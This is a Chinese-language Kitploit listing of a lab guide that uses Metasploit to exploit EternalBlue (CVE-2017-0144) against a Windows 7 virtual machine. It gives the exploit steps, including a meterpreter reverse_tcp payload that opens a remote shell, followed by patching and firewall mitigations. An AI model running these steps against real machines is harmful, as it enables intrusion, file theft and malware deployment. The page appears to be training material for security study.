Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SMB-Protocol-Vulnerability_CVE-2017-0144 — 逐步实验指南,演示如何使用 Metasploit 对 Windows 7 SMB 协议实施 EternalBlue 漏洞利用(CVE-2017-0144),涵盖环境设置、利用过程及缓解措施。 | Kitploit
工具/GitHubGitHub/luckyman2907/smb-protocol-vulnerability_cve-2017-0144
漏洞分析漏洞利用网络安全渗透测试学习与教育实验室与实践
GitHubluckyman2907/smb-protocol-vulnerability_cve-2017-0144

SMB-Protocol-Vulnerability_CVE-2017-0144

逐步实验指南,演示如何使用 Metasploit 对 Windows 7 SMB 协议实施 EternalBlue 漏洞利用(CVE-2017-0144),涵盖环境设置、利用过程及缓解措施。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
21年前尚未审核
分享

LAB: 基于SMB协议漏洞的Windows操作系统攻击

  • 1. 描述
  • 2. 概述
  • 3. 准备
  • 4. 实施攻击
  • 5. 防御方法

1. 描述

在本实验中,我们将使用两台计算机模拟基于Windows操作系统SMB协议漏洞的攻击。一台运行Kali Linux操作系统,扮演攻击者(黑客)。另一台计算机扮演受害者(victim)。受害机器运行的是包含SMB漏洞的Windows 7 64位操作系统。为此,我们将在Kali Linux机器上使用名为EternalBlue的漏洞利用代码攻击Windows 7机器。

2. 概述

Server Message Block(SMB)是一种在微软Windows平台上非常常见的文件共享协议。借助SMB协议,同一网络层或同一域内的Windows计算机可以互相共享文件。至今,SMB还有另一个名称:Common Internet File Sharing(CIFS)。

EternalBlue是一种基于SMB协议漏洞(通过445端口)的信息利用代码。最初,EternalBlue由美国国家安全局(NSA)开发。完整英文名称为U.S. National Security Agency。但后来,它于2017年被黑客组织The Shadow Brokers泄露。同年,一场针对微软Windows计算机的大规模勒索病毒攻击在全球范围内爆发。其中,最著名的仍是WannaCry病毒。尽管此漏洞已被微软通过安全更新MS17-010修补,但全球仍有大量运行Windows操作系统的计算机存在此漏洞。该漏洞在CVE-2017-0144中公布(Windows SMB远程代码执行漏洞)。此漏洞极其危险且极易被利用。值得一提的是,通过这个SMB协议漏洞进行攻击,黑客无需发送或诱骗受害者下载或运行任何恶意病毒。也就是说,即使受害者什么都不做,仍可能被黑客轻易攻击并控制计算机,而毫不知情。

3. 准备

准备两台在VMware Workstation软件上运行的虚拟机:

  • Kali Linux虚拟机(黑客机器)IP地址:192.168.198.140
  • Windows 7虚拟机(受害机器)IP地址:192.168.198.143

  1. 在Kali虚拟机(攻击机)上:

    • 检查IP地址:ifconfig
    • 启动Postgresql服务:service postgresql start
    • 检查postgresql是否已运行,使用命令:service postgresql status
  2. 在Windows 7虚拟机(受害机)上:

    • 检查IP地址:ipconfig
    • 关闭防火墙(Firewall)

4. 实施攻击

  • 在Kali机器上:使用命令msfconsole登录Metasploit

  • 进入Metasploit后,使用命令search ms17_010搜索与ms17_010相关的漏洞及语法

  • 添加受害机和攻击机的IP地址
  • 设置利用载荷: use 0 -> set payload windows/x64/meterpreter/reverse_tcp

  • 运行exploit以进行利用
  • 在成功入侵后,在受害机器上打开shell(通过攻击机终端执行)

=>至此,黑客已成功入侵受害机器。此时,黑客可以删除、窃取受害机器上的文件而受害者毫无察觉。甚至,黑客可以直接上传并运行病毒。

5. 防御方法

为避免SMB协议被利用和滥用,我们需要执行以下操作:

  • 启用防火墙(Firewall)。
  • 将Windows更新到最新版本。或下载并安装微软的安全补丁,特别是ms17_010安全补丁。
  • 阻止端口135、445。
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"
下载工具